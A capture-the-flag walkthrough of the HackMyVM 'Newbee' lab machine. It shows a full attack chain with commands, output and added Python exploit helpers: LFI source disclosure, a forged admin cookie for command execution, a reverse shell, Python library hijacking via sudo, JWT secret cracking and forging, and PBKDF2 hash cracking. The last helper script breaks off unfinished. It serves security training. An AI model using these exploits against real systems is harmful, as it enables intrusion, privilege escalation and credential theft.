HackMyVM-Newbee-Walkthrough
城南花已开 Lv6

Information gathering

Service discovery

sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e4:1a:e5 VMware, Inc.
192.168.60.132 00:0c:29:d3:79:74 VMware, Inc.
192.168.60.254 00:50:56:f0:6f:4b VMware, Inc.
^C
export ip=192.168.60.132
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
I scanned ports so fast, even my computer was surprised.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.132:22
Open 192.168.60.132:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 15:59 CST
Initiating ARP Ping Scan at 15:59
Scanning 192.168.60.132 [1 port]
Completed ARP Ping Scan at 15:59, 0.09s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:59
Completed Parallel DNS resolution of 1 host. at 15:59, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:59
Scanning 192.168.60.132 [2 ports]
Discovered open port 80/tcp on 192.168.60.132
Discovered open port 22/tcp on 192.168.60.132
Completed SYN Stealth Scan at 15:59, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.132
Host is up, received arp-response (0.0028s latency).
Scanned at 2025-04-01 15:59:18 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 00:0C:29:D3:79:74 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Directory scan

❯ gobuster dir -u  "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.235
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 18852]
/contact.php (Status: 200) [Size: 8853]
/blog.php (Status: 200) [Size: 9782]
/about.php (Status: 200) [Size: 10036]
/products.php (Status: 200) [Size: 12163]
/terms.php (Status: 200) [Size: 6670]
/assets (Status: 301) [Size: 317] [--> http://192.168.60.235/assets/]
/testimonials.php (Status: 200) [Size: 7907]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.235/javascript/]
/checkout.php (Status: 200) [Size: 13307]
/secret.php (Status: 200) [Size: 2187]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

Opening it in a browser shows an online shop.

[screenshot]

LFI (local file inclusion)

curl index.php

There is an HTML comment at the end of the response

❯ curl $ip
<!DOCTYPE html>
<html lang="en">

<head>
………………省略…………
<!--Wrong paramter to GET-->
The comment complains about a wrong GET parameter.

Fuzz the parameter name; the page probably includes whatever file the parameter names (LFI).

The parameter turns out to be hack

❯ wfuzz -c -u "http://192.168.60.235/index.php?FUZZ=/etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt  --hw 1267
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.235/index.php?FUZZ=/etc/passwd
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000001687: 200 376 L 1270 W 18863 Ch "hack"
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:Finishing pending requests...

Total time: 46.49476
Processed Requests: 30493
Filtered Requests: 30492
Requests/sec.: 655.8373

Request the page with the hack parameter

A new comment appears

❯ curl "$ip/index.php?hack=/etc/passwd"
<!-- include failed try another file -->

/secret.php, meanwhile, presents a command console.

[screenshot]

It refuses to run anything, saying admin permission is missing.

Use the LFI above to read its source.

The php://filter/convert.base64-encode/resource= wrapper returns the PHP source base64-encoded instead of executing it.

❯ curl "$ip/index.php?hack=php://filter/convert.base64-encode/resource=secret.php"
</html>
PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJ6aC1DTiI+DQo8aGVhZD4NCiAgICA8bWV0YSBjaGFyc2V0PSJVVEYtOCI+DQogICAgPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCwgaW5pdGlhbC1zY2FsZT0xLjAiPg0KICAgIDx0aXRsZT7lkb3ku6TooYzmjqfliLblj7A8L3RpdGxlPg0KICAgIDxzdHlsZT4NCiAgICAgICAgYm9keSB7DQogICAgICAgICAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjMWUxZTFlOw0KICAgICAgICAgICAgZm9udC1mYW1pbHk6IENvbnNvbGFzLCBtb25vc3BhY2U7DQogICAgICAgICAgICBjb2xvcjogI2ZmZjsNCiAgICAgICAgICAgIG1hcmdpbjogMDsNCiAgICAgICAgICAgIHBhZGRpbmc6IDA7DQogICAgICAgIH0NCg0KICAgICAgICAuY29uc29sZSB7DQogICAgICAgICAgICB3aWR0aDogODAlOw0KICAgICAgICAgICAgbWFyZ2luOiA1MHB4IGF1dG87DQogICAgICAgICAgICBwYWRkaW5nOiAyMHB4Ow0KICAgICAgICAgICAgYmFja2dyb3VuZC1jb2xvcjogIzAwMDsNCiAgICAgICAgICAgIGJvcmRlci1yYWRpdXM6IDhweDsNCiAgICAgICAgICAgIGJveC1zaGFkb3c6IDAgNHB4IDEwcHggcmdiYSgwLCAwLCAwLCAwLjUpOw0KICAgICAgICAgICAgaGVpZ2h0OiA0MDBweDsNCiAgICAgICAgICAgIG92ZXJmbG93LXk6IGF1dG87DQogICAgICAgICAgICBmb250LXNpemU6IDE2cHg7DQogICAgICAgIH0NCg0KICAgICAgICAub3V0cHV0IHsNCiAgICAgICAgICAgIHdoaXRlLXNwYWNlOiBwcmUtd3JhcDsNCiAgICAgICAgICAgIG1hcmdpbi1ib3R0b206IDEwcHg7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIHsNCiAgICAgICAgICAgIGRpc3BsYXk6IGZsZXg7DQogICAgICAgICAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgICAgICB9DQoNCiAgICAgICAgLmlucHV0LWNvbnRhaW5lciAucHJvbXB0IHsNCiAgICAgICAgICAgIGNvbG9yOiAjMDBmZjAwOw0KICAgICAgICAgICAgbWFyZ2luLXJpZ2h0OiA1cHg7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0IHsNCiAgICAgICAgICAgIGJhY2tncm91bmQ6IHRyYW5zcGFyZW50Ow0KICAgICAgICAgICAgYm9yZGVyOiBub25lOw0KICAgICAgICAgICAgY29sb3I6ICNmZmY7DQogICAgICAgICAgICB3aWR0aDogMTAwJTsNCiAgICAgICAgICAgIHBhZGRpbmc6IDVweDsNCiAgICAgICAgICAgIGZvbnQtc2l6ZTogMTZweDsNCiAgICAgICAgICAgIG91dGxpbmU6IG5vbmU7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0OmZvY3VzIHsNCiAgICAgICAgICAgIGJvcmRlcjogMXB4IHNvbGlkICMwMGZmMDA7DQogICAgICAgIH0NCg0KICAgICAgICAuaW5wdXQtY29udGFpbmVyIGlucHV0OjpwbGFjZWhvbGRlciB7DQogICAgICAgICAgICBjb2xvcjogIzg4ODsNCiAgICAgICAgfQ0KDQogICAgICAgIC5jb25zb2xlLWZvb3RlciB7DQogICAg
ICAgICAgICBwYWRkaW5nLXRvcDogMTBweDsNCiAgICAgICAgICAgIGNvbG9yOiAjODg4Ow0KICAgICAgICAgICAgZm9udC1zaXplOiAxMnB4Ow0KICAgICAgICAgICAgdGV4dC1hbGlnbjogY2VudGVyOw0KICAgICAgICB9DQogICAgPC9zdHlsZT4NCjwvaGVhZD4NCjxib2R5Pg0KDQo8ZGl2IGNsYXNzPSJjb25zb2xlIj4NCiAgICA8ZGl2IGNsYXNzPSJvdXRwdXQiIGlkPSJvdXRwdXQiPg0KICAgICAgICA8P3BocA0KDQogICAgICAgIGlmIChpc3NldCgkX0NPT0tJRVsnQXJlWW91QWRtaW4nXSkgJiYgJF9DT09LSUVbJ0FyZVlvdUFkbWluJ10gPT09ICdZZXMnKSB7DQoNCiAgICAgICAgICAgIGlmIChpc3NldCgkX0dFVFsnY29tbWFuZCddKSkgew0KICAgICAgICAgICAgICAgICRjb21tYW5kID0gJF9HRVRbJ2NvbW1hbmQnXTsNCiAgICAgICAgICAgICAgICAkb3V0cHV0ID0gc2hlbGxfZXhlYygkY29tbWFuZCk7DQogICAgICAgICAgICAgICAgZWNobyAnPGRpdj5cPiAnIC4gaHRtbHNwZWNpYWxjaGFycygkY29tbWFuZCkgLiAnPC9kaXY+JzsNCiAgICAgICAgICAgICAgICBlY2hvICc8ZGl2PicgLiBubDJicihodG1sc3BlY2lhbGNoYXJzKCRvdXRwdXQpKSAuICc8L2Rpdj4nOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9IGVsc2Ugew0KICAgICAgICAgICAgZWNobyAnPGRpdj5ObyBwZXJtaXNzaW9uIHRvIGV4ZWN1dGUgY29tbWFuZHMsIGxhY2tpbmcgYWRtaW4gcGVybWlzc2lvbi48L2Rpdj4nOw0KICAgICAgICB9DQogICAgICAgID8+DQogICAgPC9kaXY+DQoNCiAgICA8ZGl2IGNsYXNzPSJpbnB1dC1jb250YWluZXIiPg0KICAgICAgICA8c3BhbiBjbGFzcz0icHJvbXB0Ij5cPjwvc3Bhbj4NCiAgICAgICAgPGZvcm0gbWV0aG9kPSJnZXQiPg0KICAgICAgICAgICAgPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImNvbW1hbmQiIGlkPSJpbnB1dCIgcGxhY2Vob2xkZXI9ImNvbW1hbmQuLi4iIGF1dG9jb21wbGV0ZT0ib2ZmIj4NCiAgICAgICAgPC9mb3JtPg0KICAgIDwvZGl2Pg0KPC9kaXY+DQoNCjxzY3JpcHQ+DQogICAgY29uc3QgaW5wdXRGaWVsZCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpbnB1dCIpOw0KDQogICAgaW5wdXRGaWVsZC5mb2N1cygpOw0KPC9zY3JpcHQ+DQoNCjwvYm9keT4NCjwvaHRtbD4NCg==<!-- include failed try another file -->%

Cookie forgery

Base64-decode the output

Only the PHP logic matters; the CSS is left out below

<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>命令行控制台</title>
</head>
<body>

<div class="console">
    <div class="output" id="output">
        <?php

        if (isset($_COOKIE['AreYouAdmin']) && $_COOKIE['AreYouAdmin'] === 'Yes') {

            if (isset($_GET['command'])) {
                $command = $_GET['command'];
                $output = shell_exec($command);
                echo '<div>\> ' . htmlspecialchars($command) . '</div>';
                echo '<div>' . nl2br(htmlspecialchars($output)) . '</div>';
            }
        } else {
            echo '<div>No permission to execute commands, lacking admin permission.</div>';
        }
        ?>
    </div>

    <div class="input-container">
        <span class="prompt">\></span>
        <form method="get">
            <input type="text" name="command" id="input" placeholder="command..." autocomplete="off">
        </form>
    </div>
</div>

<script>
    const inputField = document.getElementById("input");

    inputField.focus();
</script>

</body>
</html>

The only check is a strict comparison of the AreYouAdmin cookie against the string Yes, so setting Cookie: AreYouAdmin=Yes turns the console into unauthenticated command execution through the command GET parameter.

Use it to launch a reverse shell.

[screenshot]
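The following Python client is an added example, not code from the walkthrough or the box. It sends the forged cookie to /secret.php and undoes the htmlspecialchars() and nl2br() wrapping that the PHP above applies to the command output, so the caller gets the raw text back. The base URL is whatever host you are targeting; the sample responses at the bottom are constructed for an offline check and were not captured from the machine.

```python
import html
import re
import urllib.parse
import urllib.request

ADMIN_COOKIE = "AreYouAdmin=Yes"   # secret.php compares the cookie with === 'Yes'

# secret.php echoes '<div>\> <cmd></div>' followed by '<div><nl2br(htmlspecialchars(output))></div>'
_CONSOLE_RE = re.compile(r"<div>\\> (?P<cmd>[^<]*)</div>\s*<div>(?P<out>.*?)</div>", re.S)
_DENIED = "No permission to execute commands, lacking admin permission."


def is_denied(page: str) -> bool:
    """True when secret.php answered with its 'lacking admin permission' message."""
    return _DENIED in page


def parse_console_output(page: str) -> str:
    """Undo nl2br() and htmlspecialchars() and return the raw command output."""
    if is_denied(page):
        raise PermissionError("cookie not accepted: AreYouAdmin must be exactly 'Yes'")
    m = _CONSOLE_RE.search(page)
    if m is None:
        return ""                                   # no ?command= was supplied
    text = m.group("out").replace("<br />", "")     # nl2br() inserts <br /> before every newline
    return html.unescape(text).strip()              # reverse htmlspecialchars()


def exec_via_console(base_url: str, command: str, timeout: float = 10.0) -> str:
    """Run `command` through /secret.php with the forged admin cookie (network call)."""
    url = base_url.rstrip("/") + "/secret.php?" + urllib.parse.urlencode({"command": command})
    req = urllib.request.Request(url, headers={"Cookie": ADMIN_COOKIE})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return parse_console_output(resp.read().decode("utf-8", "replace"))


# Constructed sample responses (not captured from the box) for an offline check
SAMPLE_OK = (
    '<div class="output" id="output">\n'
    "<div>\\> id</div><div>uid=33(www-data) gid=33(www-data) groups=33(www-data)<br />\n</div>\n"
    "</div>"
)
SAMPLE_ESCAPED = "<div>\\> echo &lt;a&gt;&amp;&lt;b&gt;</div><div>&lt;a&gt;&amp;&lt;b&gt;<br />\n</div>"
SAMPLE_DENIED = "<div>" + _DENIED + "</div>"

if __name__ == "__main__":
    print(parse_console_output(SAMPLE_OK))
    # Live use, e.g.: print(exec_via_console("http://192.168.60.132", "id"))
```

Because the command travels in the query string, URL-encode it (urlencode() does that here); a bare `&` or `#` in a reverse-shell one-liner would otherwise be swallowed by the URL parser rather than reaching shell_exec().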

Getting a user shell

Start a listener

We land as www-data

❯ pwncat-cs -lp 4444
[16:03:23] Welcome to pwncat 🐈! __main__.py:164
[16:03:25] received connection from 192.168.60.132:42388 bind.py:84
[16:03:40] 192.168.60.132:42388: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@Newbee:/var/www/html/shop$ sudo -l
sudo: unable to resolve host Newbee: Name or service not known
Matching Defaults entries for www-data on Newbee:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, targetpw, use_pty

User www-data may run the following commands on Newbee:
(debian) NOPASSWD: /usr/bin/python3 /var/www/html/vuln.py

Reading index.php explains why /etc/passwd failed

The include only runs when the decoded, ../-stripped value contains the string secret at an offset greater than zero (the strpos() result is used as a boolean, so a match at offset 0 is treated as false)

So no amount of path-traversal trickery reads arbitrary files; only values that contain secret, such as the php://filter wrapper with resource=secret.php, get through

<?php
ini_set('display_errors', 'Off');
error_reporting(0);
if (isset($_GET['hack'])) {
    $file = $_GET['hack'];
    while (rawurldecode($file) !== $file) {
        $file = rawurldecode($file);
    }


    while (strpos($file, '../') !== false) {
        $file = str_replace('../', '', $file);
    }
    if(strpos($file,'secret'))
    {
        include $file;
    }

    echo "<!-- include failed try another file -->";

}
else {
    echo "<!--Wrong paramter to GET-->";
}
?>
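To see exactly which values the gate in index.php lets through, here is an added Python emulation of its sanitiser (not code from the walkthrough or the box). php_include_gate mirrors the repeated rawurldecode(), the "../" stripping loop and the strpos() test, and returns the final path together with whether include would run. The payloads in the main block are constructed test inputs.

```python
from urllib.parse import unquote


def php_include_gate(hack: str):
    """Emulate index.php's handling of ?hack=... ; returns (final_path, would_include)."""
    # 1. rawurldecode() until the value stops changing: %252e%252e%2f -> %2e%2e/ -> ../
    #    (unquote(), like rawurldecode(), leaves '+' alone)
    file = hack
    while unquote(file) != file:
        file = unquote(file)

    # 2. str_replace('../', '') until no '../' is left, so '....//' collapses
    #    to '../' on the first pass and to '' on the second
    while "../" in file:
        file = file.replace("../", "")

    # 3. if(strpos($file,'secret')): the offset is used as a boolean, so 'secret'
    #    at position 0 is false and the include is skipped; -1 (not found) is
    #    PHP's false as well
    pos = file.find("secret")
    would_include = pos > 0
    return file, would_include


if __name__ == "__main__":
    for payload in (
        "/etc/passwd",
        "secret.php",
        "./secret.php",
        "php://filter/convert.base64-encode/resource=secret.php",
        "....//....//etc/passwd",
        "%252e%252e%2fsecret.php",
    ):
        print(f"{payload!r:60} -> {php_include_gate(payload)}")
```

Two things fall out of the emulation: `hack=secret.php` is rejected even though it is the intended file (offset 0), while `hack=./secret.php` or the filter wrapper pass, and the double-encoding and `....//` tricks are neutralised before the gate, which is why the walkthrough stops trying to read other files.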

Python library hijacking

www-data may run vuln.py as the user debian through sudo

Check which modules vuln.py imports

(remote) www-data@Newbee:/var/www/html$ cat vuln.py
import random
import time
import math
import string
import datetime

def generate_random_string(length=10):

    return ''.join(random.choices(string.ascii_letters + string.digits, k=length))

def pointless_computation():

    number = random.randint(1, 1000)
    result = math.sqrt(number) * math.log(number)
    print(f"Calculated math nonsense: sqrt({number}) * log({number}) = {result}")

def simulate_time_wasting():

    now = datetime.datetime.now()
    print(f"Started wasting time at {now}")
    time.sleep(2) # deliberately sleep for 2 seconds
    later = datetime.datetime.now()
    print(f"Finished wasting time at {later}. Time wasted: {later - now}")

def pointless_string_operations():

    rand_str = generate_random_string()
    print(f"Generated random string: {rand_str}")
    reversed_str = rand_str[::-1]
    print(f"Reversed string: {reversed_str}")
    print(f"String length: {len(rand_str)}")

if __name__ == "__main__":
    pointless_computation()
    simulate_time_wasting()
    pointless_string_operations()
    print("All done. The script accomplished nothing useful.")

Write a module with the same name as one of those imports (random.py) into /var/www/html, the directory vuln.py lives in. Python puts the script's own directory at the front of sys.path, so that file is imported ahead of the standard-library random module; the shell's working directory does not matter.

Then run the sudo command and the code in random.py executes as debian

debian@debian:~$ vi random.py
import os
os.system("/bin/bash")
(remote) www-data@Newbee:/var/www/html$ sudo -u debian /usr/bin/python3 /var/www/html/vuln.py
sudo: unable to resolve host Newbee: Name or service not known
debian@Newbee:/var/www/html$
debian@Newbee:/var/www/html$ cd ~
debian@Newbee:~$ cat user.txt
ed2b1f468c5f915f3f1cf75d7068baae

Root privilege escalation

The home directory also contains a note

and ports 3306 and 5000 are listening on localhost only

11
(remote) www-data@debian:/var/www/html$ cat note.txt
Damn it, I forgot my database password. I heard that Debian is currently building a message board, maybe he can help me
该死,我忘记了我的数据库密码。听说Debian目前正在建立一个留言板,也许他可以帮助我。
(remote) www-data@debian:/tmp$ ss -luntp
Netid State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
udp UNCONN 0 0 0.0.0.0:68 0.0.0.0:*
tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
tcp LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
tcp LISTEN 0 128 127.0.0.1:5000 0.0.0.0:*
tcp LISTEN 0 511 *:80 *:*
tcp LISTEN 0 128 [::]:22 [::]:*

Forward port 5000 out with socat

(remote) www-data@debian:/tmp$ ./socat TCP-LISTEN:5001,fork TCP4:127.0.0.1:5000&                                                                    
[2] 27843
--------------------------------------------------------------------
❯ nmap -p 5001 $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-08 16:34 CST
Nmap scan report for 192.168.60.235
Host is up (0.00034s latency).

PORT STATE SERVICE
5001/tcp open commplex-link
MAC Address: 00:0C:29:DE:6F:B8 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds

JWT forgery

Browsing to the forwarded port: it is indeed a message board

but you have to log in to see any content

[screenshot]

A comment in the page source hints that the user's secret key is very simple

[screenshot]

When you try to log in, any username other than admin is accepted with any password

which confirms that the admin account exists

I log in as an arbitrary user, aaa

Capturing the request in Burp Suite shows that a successful login sets a cookie

[screenshot]

Decoding it shows that it is a JWT

[screenshot]

So we can try to forge it

Change the username

[screenshot]

The problem is that we do not know the secret key

so the forgery fails: after editing the cookie and refreshing, the session drops back to the login page

We need to brute-force the JWT secret

Brute Force - CheatSheet - HackTricks

Sjord/jwtcrack: Crack the shared secret of a HS256-signed JWT

brendan-rius/c-jwt-cracker: a JWT brute-forcer written in C

If you use the Python script, change the open() call for the dictionary to specify an encoding:

with open(dictionary, 'r', encoding='utf-8', errors='ignore') as fp:

❯ git clone https://github.com/Sjord/jwtcrack.git
Cloning into 'jwtcrack'...
remote: Enumerating objects: 68, done.
remote: Counting objects: 100% (8/8), done.
remote: Compressing objects: 100% (8/8), done.
remote: Total 68 (delta 1), reused 5 (delta 0), pack-reused 60 (from 1)
Receiving objects: 100% (68/68), 24.53 KiB | 358.00 KiB/s, done.
Resolving deltas: 100% (22/22), done.
cd jwtcrack
❯ grep "noob" /usr/share/wordlists/rockyou.txt>aa.txt
❯ python crackjwt.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSIsImV4cCI6MTc0MTQyODM4N30.HgOioenDyUlk1GcYkKR3h3K0bYDn6p_pnhENbsL3W5E aa.txt
Cracking JWT eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFhYSIsImV4cCI6MTc0MTQyODM4N30.HgOioenDyUlk1GcYkKR3h3K0bYDn6p_pnhENbsL3W5E
413it [00:00, 93817.57it/s]
Found secret key: noob

The secret is noob; build a new JWT with it

Set the new cookie with Cookie Editor

[screenshot]
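The crack-and-forge step above, written out as an added example (not code from the walkthrough or from jwtcrack): sign_hs256 builds a token the way an HS256 app does, crack_hs256 tries each candidate secret against a captured token's signature, and forge re-signs the captured claims with the recovered secret after changing the username and refreshing exp. PAGE_TOKEN is the token captured in the walkthrough; the candidate list in the main block is a constructed stand-in for the grepped rockyou lines.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(claims: dict, secret: str) -> str:
    """header.payload.signature with compact JSON, as PyJWT/Flask apps emit it."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute HMAC-SHA256 over header.payload and compare it with the signature."""
    header, payload, sig = token.split(".")
    expected = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig))


def claims_of(token: str) -> dict:
    return json.loads(_b64url_decode(token.split(".")[1]))


def crack_hs256(token: str, candidates):
    """Dictionary attack: return the first candidate whose HMAC matches the signature."""
    for secret in candidates:
        secret = secret.rstrip("\r\n")          # wordlist lines carry their newline
        if verify_hs256(token, secret):
            return secret
    return None


def forge(token: str, secret: str, **overrides) -> str:
    """Re-sign the token's claims with the recovered secret, e.g. username='admin'."""
    claims = claims_of(token)
    claims.update(overrides)
    claims["exp"] = int(time.time()) + 3600     # fresh expiry so the app accepts it
    return sign_hs256(claims, secret)


# Token captured in the walkthrough for user aaa; jwtcrack reported the secret "noob"
PAGE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJ1c2VybmFtZSI6ImFhYSIsImV4cCI6MTc0MTQyODM4N30."
              "HgOioenDyUlk1GcYkKR3h3K0bYDn6p_pnhENbsL3W5E")

if __name__ == "__main__":
    secret = crack_hs256(PAGE_TOKEN, ["123456", "password", "noob", "noob123"])
    print("secret:", secret)
    if secret:
        print("forged:", forge(PAGE_TOKEN, secret, username="admin"))
```

A cracked HS256 secret is equivalent to the application's signing key, so anything the server trusts from the token (here the username, and hence the admin view that leaks the MySQL credentials) can be asserted freely; rotating to a long random secret, or to an asymmetric algorithm, is the fix.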

Hash cracking

The admin view gives up the MySQL credentials root:TheStrongestPasswordHYHcreated

Connect to MySQL

(remote) www-data@debian:/var/www/html/flask$ mysql -uroot -pThePasswordYouNeverCracked
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 27710
Server version: 10.11.6-MariaDB-0+deb12u1 Debian 12

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| sys |
| user |
+--------------------+
5 rows in set (0.006 sec)

MariaDB [(none)]> use user
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [user]> select * from user;
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| id | username | passwd | salt | passwd_hash_algo |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
| 1 | debian | 2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0 | 8bf3e3452b78544f8bee9400d6936d34 | pbdf2$50500$60 |
+----+----------+--------------------------------------------------------------------------------------------------------------------------+----------------------------------+------------------+
1 row in set (0.002 sec)

MariaDB [user]>

The box author's hint: just crack the hash

hashcat looked like the slower route at first, so here is the author's script

import hashlib
import binascii

def pbkdf2_hash(password, salt, iterations=50500, dklen=60):
    # PBKDF2-HMAC-SHA256, 50500 rounds, 60-byte output: the parameters encoded
    # in the passwd_hash_algo column value "pbdf2$50500$60"
    hash_value = hashlib.pbkdf2_hmac(
        'sha256',
        password.encode('utf-8'),
        salt,
        iterations,
        dklen
    )
    return hash_value

def find_matching_password(dictionary_file, target_hash, salt, iterations=50500, dklen=60):
    target_hash_bytes = binascii.unhexlify(target_hash)

    # rockyou.txt is not valid UTF-8 all the way through; errors='ignore'
    # keeps the loop from dying on a bad line
    with open(dictionary_file, 'r', encoding='utf-8', errors='ignore') as file:
        count = 0
        for line in file:
            password = line.strip()
            hash_value = pbkdf2_hash(password, salt, iterations, dklen)
            count += 1
            print(f"Checking password {count}: {password}")
            if hash_value == target_hash_bytes:
                print(f"\nFound password: {password}")
                return password
    print("Password not found.")
    return None

salt = binascii.unhexlify('8bf3e3452b78544f8bee9400d6936d34')
target_hash = '2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0'
dictionary_file = '/usr/share/wordlists/rockyou.txt'
find_matching_password(dictionary_file, target_hash, salt)

Run it: the password is 1qaz2wsx

❯ python exp.py

Checking password 1420: 1qaz2wsx

Found password: 1qaz2wsx

For confirmation, run it through hashcat as well

[HackMyVM-Listen1 1-Walkthrough | Pepster’Blog](https://pepster.me/HackMyVM-Listen 1 1/#pbkdf2爆破)

hashcat mode 10900 expects sha256:<iterations>:<base64 salt>:<base64 digest>, so the salt and digest must be converted from hex to raw bytes and then base64-encoded before the hash line is assembled

echo -n "8bf3e3452b78544f8bee9400d6936d34" |xxd -r -p |base64
i/PjRSt4VE+L7pQA1pNtNA==
echo -n "2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0" |xxd -r -p |base64
LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSG
XEHA
echo -n "sha256:50500:i/PjRSt4VE+L7pQA1pNtNA==:LAguP/LKFeOyT4FdcGU/DerQlTRJUGndFA4ZrbLRFyZsxLHeja9Vx8SCegpcz3DG9Tf/xN3HTbSGXEHA" >hash
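The same conversion and a check of the recovered password, as an added Python example (not the box author's script above and not part of the walkthrough). parse_algo reads the iteration count and derived-key length out of the passwd_hash_algo column, to_hashcat_10900 produces the line hashcat -m 10900 expects, and check_password recomputes PBKDF2-HMAC-SHA256 with those parameters and compares in constant time. The salt, digest and algorithm string are the values from the user table dump; the candidate list in the main block is constructed.

```python
import base64
import binascii
import hashlib
import hmac

# Values from the user table dumped above
SALT_HEX = "8bf3e3452b78544f8bee9400d6936d34"
DIGEST_HEX = "2c082e3ff2ca15e3b24f815d70653f0dead09534495069dd140e19adb2d117266cc4b1de8daf55c7c4827a0a5ccf70c6f537ffc4ddc74db4865c41c0"
ALGO = "pbdf2$50500$60"


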